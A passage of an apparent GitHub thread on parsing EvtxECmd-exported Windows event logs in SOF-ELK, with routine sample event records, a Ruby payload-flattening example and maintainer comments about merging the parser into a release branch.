{"ChunkNumber":5,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":\"\"}","UserId":"S-1-5-18","Channel":"Microsoft-Client-Licensing-Platform/Admin","Provider":"Microsoft-Client-Licensing-Platform","EventId":102,"EventRecordId":"10643","ProcessId":11872,"ThreadId":9636,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Client-Licensing-Platform%4Admin.evtx","TimeCreated":"2018-09-05T12:34:53.2131727+00:00","RecordNumber":10643}
{"ChunkNumber":107,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.98, 80240437, 00000000-0000-0000-0000-000000000000, Scan, 0, 0, 0, Update;taskhostw, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WERBE1C.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.98_d127d0c9d9253bdcb4e9f182ac69fab59f08c0_00000000_54446433, 0, 883c1649-88c7-496b-92d3-a966b76a78bb, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"254517","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-03T03:29:33.0449360+00:00","RecordNumber":254517}
{"ChunkNumber":107,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"CreatedTaskProcess\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\QueueReporting\"},{\"@Name\":\"Path\",\"#text\":\"%windir%\\\\system32\\\\wermgr.exe\"},{\"@Name\":\"ProcessID\",\"#text\":\"14532\"},{\"@Name\":\"Priority\",\"#text\":\"16384\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":129,"EventRecordId":"193717","ProcessId":1484,"ThreadId":3896,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-08-27T01:07:12.1239454+00:00","RecordNumber":193717}
{"ChunkNumber":20,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SupportInfo1\",\"#text\":\"1\"},{\"@Name\":\"SupportInfo2\",\"#text\":\"4220\"},{\"@Name\":\"ProcessingMode\",\"#text\":\"0\"},{\"@Name\":\"ProcessingTimeInMilliseconds\",\"#text\":\"1110\"},{\"@Name\":\"DCName\",\"#text\":\"\\\\\\\\base-dc.shieldbase.lan\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"System","Provider":"Microsoft-Windows-GroupPolicy","EventId":1501,"EventRecordId":"3190","ProcessId":8,"ThreadId":6072,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\System.evtx","TimeCreated":"2018-06-20T23:33:16.5893056+00:00","RecordNumber":3190}
{"ChunkNumber":320,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"TargetUserName\",\"#text\":\"Administrators\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"Builtin\"},{\"@Name\":\"TargetSid\",\"#text\":\"S-1-5-32-544\"},{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"CallerProcessId\",\"#text\":\"0x764\"},{\"@Name\":\"CallerProcessName\",\"#text\":\"C:\\\\Windows\\\\System32\\\\svchost.exe\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4799,"EventRecordId":"30264","ProcessId":744,"ThreadId":13956,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-08-06T17:51:27.5164000+00:00","RecordNumber":30264}
{"ChunkNumber":18,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.98, 80240437, 00000000-0000-0000-0000-000000000000, Scan, 0, 0, 0, Update;taskhostw, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WER27F3.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.98_d127d0c9d9253bdcb4e9f182ac69fab59f08c0_00000000_5ecccf33, 0, c664e050-134f-4437-a59f-faf6053fccd9, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"269151","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-06T03:27:23.5765145+00:00","RecordNumber":269151}
{"ChunkNumber":272,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"Returning key document for contentid 0116DC02-781B-D1D1-FC1C-C80195511E17\"},{\"@Name\":\"Function\",\"#text\":\"ClipStorage::GetKeyDocumentForContentWithIdAndMinQuality\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\clipstorage.cpp\"},{\"@Name\":\"Line Number\",\"#text\":\"272\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1116","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"278130","ProcessId":960,"ThreadId":7200,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-07T01:56:10.2943887+00:00","RecordNumber":278130}
{"ChunkNumber":8,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"jobTitle\",\"#text\":\"Microsoft Outlook Offline Address Book 3c9607ed2806b545b1f5456d27735613\"},{\"@Name\":\"jobId\",\"#text\":\"f88b1871-b57c-43cc-9a47-53fe1d131497\"},{\"@Name\":\"jobOwner\",\"#text\":\"shieldbase\\\\tdungan\"},{\"@Name\":\"processPath\",\"#text\":\"C:\\\\Program Files (x86)\\\\Microsoft Office\\\\root\\\\Office16\\\\OUTLOOK.EXE\"},{\"@Name\":\"processId\",\"#text\":\"8128\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Bits-Client/Operational","Provider":"Microsoft-Windows-Bits-Client","EventId":3,"EventRecordId":"12477","ProcessId":556,"ThreadId":11288,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Bits-Client%4Operational.evtx","TimeCreated":"2018-09-05T09:47:58.6843438+00:00","RecordNumber":12477}
{"ChunkNumber":70,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"7283","ProcessId":624,"ThreadId":1848,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-10T12:25:25.3832561+00:00","RecordNumber":7283}
{"ChunkNumber":83,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"operationName\",\"#text\":\"Enumeration\"},{\"@Name\":\"resourceUri\",\"#text\":\"http://schemas.microsoft.com/wbem/wsman/1/SubscriptionManager/Subscription\"}]}}","UserId":"S-1-5-20","Channel":"Microsoft-Windows-WinRM/Operational","Provider":"Microsoft-Windows-WinRM","EventId":145,"EventRecordId":"277711","ProcessId":1100,"ThreadId":10548,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WinRM%4Operational.evtx","TimeCreated":"2018-09-03T10:43:29.3975492+00:00","RecordNumber":277711}
{"ChunkNumber":186,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"\\tDetailSequence=1\\n\\tDetailTotal=1\\n\\n\\tSequenceNumber=409\\n\\n\\tUserId=shieldbase\\\\cbarton-a\\n\\tHostName=ServerRemoteHost\\n\\tHostVersion=1.0.0.0\\n\\tHostId=3367239b-8f30-4f1e-aec8-b9f8c6869c28\\n\\tHostApplication=C:\\\\WINDOWS\\\\system32\\\\wsmprovhost.exe -Embedding\\n\\tEngineVersion=5.1.16299.547\\n\\tRunspaceId=e666d539-477f-456c-a676-f835fdd52d52\\n\\tPipelineId=5\\n\\tScriptName=\\n\\tCommandLine=, CommandInvocation(Out-String): \\\"Out-String\\\"\\nCommandInvocation(Out-String): \\\"Out-String\\\"\\n\",\"Binary\":\"\"}}","Channel":"Windows PowerShell","Provider":"PowerShell","EventId":800,"EventRecordId":"4725","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Windows PowerShell.evtx","TimeCreated":"2018-08-15T16:32:20.7352615+00:00","RecordNumber":4725}
{"ChunkNumber":19,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"CreatedTaskProcess\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\Microsoft\\\\Windows\\\\Windows Error Reporting\\\\QueueReporting\"},{\"@Name\":\"Path\",\"#text\":\"%windir%\\\\system32\\\\wermgr.exe\"},{\"@Name\":\"ProcessID\",\"#text\":\"7292\"},{\"@Name\":\"Priority\",\"#text\":\"16384\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":129,"EventRecordId":"184051","ProcessId":1484,"ThreadId":12552,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-08-20T16:28:33.0281318+00:00","RecordNumber":184051}
{"ChunkNumber":5,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"DeviceInstanceId\",\"#text\":\"SWD\\\\PRINTENUM\\\\{149127D4-4FD1-495A-96FF-5C65F6CB2014}\"},{\"@Name\":\"ClassGuid\",\"#text\":\"1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc\"},{\"@Name\":\"Problem\",\"#text\":\"0x2D\"},{\"@Name\":\"Status\",\"#text\":\"0x0\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-Kernel-PnP/Configuration","Provider":"Microsoft-Windows-Kernel-PnP","EventId":420,"EventRecordId":"580","ProcessId":1744,"ThreadId":1948,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Kernel-PnP%4Configuration.evtx","TimeCreated":"2018-05-24T23:54:31.1902927+00:00","RecordNumber":580}
{"PayloadData1":"Task \\{18e1f675-3fe3-48f8-aac7-df7236cf7e81}","PayloadData3":"Instance Id ecdb9c2b-33d1-4bf3-ae3f-e7ce551119a6","ExecutableInfo":"Global\\JD_TaskSchedulerSchedule_{F3365228-B5DE-4AA9-A7C2-F36761486253}","MapDescription":"Scheduled task executed","ChunkNumber":84,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"@Name\":\"ActionStart\",\"Data\":[{\"@Name\":\"TaskName\",\"#text\":\"\\\\{18e1f675-3fe3-48f8-aac7-df7236cf7e81}\"},{\"@Name\":\"ActionName\",\"#text\":\"Global\\\\JD_TaskSchedulerSchedule_{F3365228-B5DE-4AA9-A7C2-F36761486253}\"},{\"@Name\":\"TaskInstanceId\",\"#text\":\"ecdb9c2b-33d1-4bf3-ae3f-e7ce551119a6\"},{\"@Name\":\"EnginePID\",\"#text\":\"0\"}]}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-TaskScheduler/Operational","Provider":"Microsoft-Windows-TaskScheduler","EventId":200,"EventRecordId":"191257","ProcessId":1484,"ThreadId":2000,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-TaskScheduler%4Operational.evtx","TimeCreated":"2018-08-25T10:34:00.5634231+00:00","RecordNumber":191257}
{"ChunkNumber":10,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"LogonType\",\"#text\":\"1026\"},{\"@Name\":\"TaskName\",\"#text\":\"InitializeBrowserSsoCookie\"}]}}","UserId":"S-1-5-21-3445421715-2530590580-3149308974-1193","Channel":"Microsoft-Windows-Shell-Core/Operational","Provider":"Microsoft-Windows-Shell-Core","EventId":62170,"EventRecordId":"3292","ProcessId":15620,"ThreadId":15572,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Shell-Core%4Operational.evtx","TimeCreated":"2018-08-28T21:39:49.1596661+00:00","RecordNumber":3292}
{"ChunkNumber":212,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"[1b88] [000001FDF0F559C8:RootMachine] Dispatch       : Root:Valid <- Root:Connect\"},{\"@Name\":\"Function\",\"#text\":\"StateMachine<class RootMachine,class RootState>::PumpEvents\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\statemachine.h\"},{\"@Name\":\"Line Number\",\"#text\":\"162\"}]}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"272470","ProcessId":692,"ThreadId":7048,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-06T07:53:16.6889387+00:00","RecordNumber":272470}
{"ChunkNumber":40,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"Message\",\"#text\":\"[15dc] [000001FDF2123B50:558F5D32-0827-EB7B-6AD6-D5DB4138B3AA] StartProcessing: Key:Valid\"},{\"@Name\":\"Function\",\"#text\":\"StateMachine<class KeyMachine,class KeyState>::PumpEvents\"},{\"@Name\":\"Source\",\"#text\":\"onecoreuap\\\\enduser\\\\winstore\\\\licensemanager\\\\lib\\\\statemachine.h\"},{\"@Name\":\"Line Number\",\"#text\":\"154\"}]}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-Store/Operational","Provider":"Microsoft-Windows-Store","EventId":8001,"EventRecordId":"256212","ProcessId":692,"ThreadId":5596,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-Store%4Operational.evtx","TimeCreated":"2018-09-03T19:22:50.4790297+00:00","RecordNumber":256212}
{"PayloadData1":"Target: shieldbase\\BASE-RD-01$","PayloadData2":"LogonType 3","MapDescription":"An account was logged off","ChunkNumber":598,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"TargetUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"TargetUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"TargetDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"TargetLogonId\",\"#text\":\"0xA8C0A28\"},{\"@Name\":\"LogonType\",\"#text\":\"3\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":4634,"EventRecordId":"53672","ProcessId":772,"ThreadId":5444,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-09-04T04:52:52.5911342+00:00","RecordNumber":53672}
{"ChunkNumber":81,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"8290","ProcessId":624,"ThreadId":1380,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-10T22:32:34.5487642+00:00","RecordNumber":8290}
{"ChunkNumber":70,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":\"0, WindowsUpdateFailure3, Not available, 0, 10.0.16299.98, 80240437, 00000000-0000-0000-0000-000000000000, Scan, 0, 0, 0, Update;taskhostw, {855E8A7C-ECB4-4CA3-B045-1DFA50104289}, 0, \\n\\\\\\\\?\\\\C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\Temp\\\\WER27F3.tmp.WERInternalMetadata.xml, C:\\\\ProgramData\\\\Microsoft\\\\Windows\\\\WER\\\\ReportQueue\\\\NonCritical_10.0.16299.98_d127d0c9d9253bdcb4e9f182ac69fab59f08c0_00000000_5ecccf33, 0, c664e050-134f-4437-a59f-faf6053fccd9, 524388\",\"Binary\":\"\"}}","Channel":"Application","Provider":"Windows Error Reporting","EventId":1001,"EventRecordId":"272419","ProcessId":0,"ThreadId":0,"Level":4,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Application.evtx","TimeCreated":"2018-09-06T18:28:54.8258888+00:00","RecordNumber":272419}
{"ChunkNumber":13,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":{\"@Name\":\"ServiceName\",\"#text\":\"Microsoft Passport\"}}}","UserId":"S-1-5-18","Channel":"Microsoft-Windows-HelloForBusiness/Operational","Provider":"Microsoft-Windows-HelloForBusiness","EventId":8025,"EventRecordId":"1954","ProcessId":1064,"ThreadId":11772,"Level":16,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-HelloForBusiness%4Operational.evtx","TimeCreated":"2018-08-31T23:24:32.8544355+00:00","RecordNumber":1954}
{"ChunkNumber":95,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"9686","ProcessId":624,"ThreadId":3132,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-11T14:25:40.3786529+00:00","RecordNumber":9686}
{"ChunkNumber":69,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"EventData\":{\"Data\":[{\"@Name\":\"SubjectUserSid\",\"#text\":\"S-1-5-18\"},{\"@Name\":\"SubjectUserName\",\"#text\":\"BASE-RD-01$\"},{\"@Name\":\"SubjectDomainName\",\"#text\":\"shieldbase\"},{\"@Name\":\"SubjectLogonId\",\"#text\":\"0x3E7\"},{\"@Name\":\"ProviderName\",\"#text\":\"Microsoft Software Key Storage Provider\"},{\"@Name\":\"AlgorithmName\",\"#text\":\"RSA\"},{\"@Name\":\"KeyName\",\"#text\":\"11599fbd-f88e-f9bb-fa76-1c9eb609a6e8\"},{\"@Name\":\"KeyType\",\"#text\":\"%%2500\"},{\"@Name\":\"Operation\",\"#text\":\"%%2480\"},{\"@Name\":\"ReturnCode\",\"#text\":\"0x0\"}]}}","Channel":"Security","Provider":"Microsoft-Windows-Security-Auditing","EventId":5061,"EventRecordId":"7100","ProcessId":624,"ThreadId":1624,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Security.evtx","TimeCreated":"2018-05-10T10:43:41.0229266+00:00","RecordNumber":7100}
{"PayloadData1":"PID: 8376","PayloadData2":"Path: C:\\Windows\\System32\\wbem\\WmiPerfInst.dll","MapDescription":"WMI wmiprvse execution","ChunkNumber":102,"Computer":"base-rd-01.shieldbase.lan","Payload":"{\"UserData\":{\"Operation_StartedOperational\":{\"ProviderName\":\"WmiPerfInst\",\"Code\":\"0x0\",\"HostProcess\":\"wmiprvse.exe\",\"ProcessID\":\"8376\",\"ProviderPath\":\"C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPerfInst.dll\"}}}","UserId":"S-1-5-19","Channel":"Microsoft-Windows-WMI-Activity/Operational","Provider":"Microsoft-Windows-WMI-Activity","EventId":5857,"EventRecordId":"16264","ProcessId":8376,"ThreadId":5680,"Level":0,"SourceFile":"E:\\C\\Windows\\system32\\winevt\\logs\\Microsoft-Windows-WMI-Activity%4Operational.evtx","TimeCreated":"2018-09-05T22:02:07.9866584+00:00","RecordNumber":16264}
philhagen commented 1 year ago

Not forgetting this - been on work travel so things are busy. Still tracking and aiming to review soon. Thanks for your patience!

philhagen commented 1 year ago

I just pushed a different implementation to develop that should address this use case. It uses the Ruby script we've implemented elsewhere, and this particular source data surfaced a data inconsistency problem (single-element vs array) that should now be gracefully handled. I verified that this properly parsed out all 100 of your samples. Before I promote to production, I'll need to do some more testing though.

In the meantime, if you want, switch your /usr/local/sof-elk/ git clone to the develop branch (as root), and reboot the VM to test the staged changes.
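The single-element-versus-array inconsistency mentioned above, together with the name-without-value case from earlier in the thread, as an added example that is not the SOF-ELK project's own Ruby filter: a stand-alone Ruby function that flattens the EvtxECmd `Payload` JSON into key/value fields. The dotted field names, the `-` placeholder and the dropping of the literal `Data` wrapper are choices made for this example, not the project's conventions.

```ruby
require 'json'

# Added example (not SOF-ELK's own filter): flatten the EvtxECmd "Payload"
# string into searchable key/value fields, handling every shape that appears
# in the samples above:
#   {"EventData":{"Data":[{"@Name":"X","#text":"v"}, ...]}}  -> EventData.X = v
#   {"EventData":{"Data":{"@Name":"X","#text":"v"}}}         -> same, single element not array
#   {"EventData":{"Data":"free text","Binary":""}}           -> EventData.Data, EventData.Binary
#   {"EventData":""}                                         -> EventData = ""
#   {"UserData":{"Op":{"ProviderName":"WmiPerfInst"}}}       -> UserData.Op.ProviderName
#   an entry with a name but no "#text"                      -> value "-" (as the PR's gsub did)

MISSING_VALUE = '-'.freeze
NAME_KEYS = %w[@Name name].freeze   # EvtxECmd writes "@Name"; the PR example used "name"
TEXT_KEYS = %w[#text text].freeze

# Parse the Payload string and return a flat Hash of "Container.Field" => value.
# Returns an empty Hash when the Payload is not valid JSON, so one bad record
# never aborts the pipeline.
def flatten_evtx_payload(payload_json)
  fields = {}
  flatten_node(fields, nil, JSON.parse(payload_json))
  fields
rescue JSON::ParserError
  {}
end

# True for a {"@Name": ..., "#text": ...} style entry (the text part is optional).
def named_entry?(node)
  node.is_a?(Hash) && NAME_KEYS.any? { |k| node.key?(k) } &&
    (node.keys - NAME_KEYS - TEXT_KEYS).empty?
end

# True when a Data value is a named entry or a list of them, so the literal
# "Data" wrapper can be dropped from the field path.
def named_data?(node)
  named_entry?(node) || (node.is_a?(Array) && node.all? { |n| named_entry?(n) })
end

def join_key(prefix, key)
  key = key.to_s.sub(/\A[@#]/, '')   # "@Name" on a container becomes "Name"
  prefix ? "#{prefix}.#{key}" : key
end

# Store a value, collapsing repeated field names into an array instead of
# silently overwriting the earlier occurrence.
def store(fields, key, value)
  fields[key] = fields.key?(key) ? Array(fields[key]) << value : value
end

def flatten_node(fields, prefix, node)
  if named_entry?(node)
    name = node.values_at(*NAME_KEYS).compact.first.to_s
    text = node.values_at(*TEXT_KEYS).compact.first
    store(fields, join_key(prefix, name), text.nil? ? MISSING_VALUE : text.to_s)
  elsif node.is_a?(Hash)
    node.each do |k, v|
      child = (k == 'Data' && named_data?(v)) ? prefix : join_key(prefix, k)
      flatten_node(fields, child, v)
    end
  elsif node.is_a?(Array)
    node.each_with_index do |item, i|
      # unnamed list items (bare strings) get a positional suffix instead
      flatten_node(fields, named_entry?(item) ? prefix : join_key(prefix, i), item)
    end
  else
    store(fields, prefix.to_s, node.nil? ? MISSING_VALUE : node.to_s)
  end
end
```

Inside a Logstash ruby filter this would be fed from `event.get("Payload")` and written back with `event.set`. The number of distinct keys it produces across a log set is what drives the `index.mapping.total_fields.limit` note earlier in the thread.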

philhagen commented 1 year ago

hi, @bedangSen - thank you so much for your patience. After testing the implementation linked above on the develop branch, I'm confident that the Ruby-based KV splitter will meet your requirements. I'm going to promote this to production on the public/v20221025 branch, which is used in the latest VM. When that is merged, I'll close this PR, as it's implemented in a manner consistent with the other similar data structures.

I have also kept your implementation handy, as I believe there are some similar requirements upstream that may benefit from that implementation. Thank you for the PR, sample data, and general inputs - these have been immensely helpful!

philhagen commented 1 year ago

This functionality should now be live in public/v20221025 via 1232ff738893aea1323ce3701c0ec594ad566e46. Thank you again for the inputs and help getting this done!

bedangSen commented 1 year ago

Thanks @philhagen! This is awesome!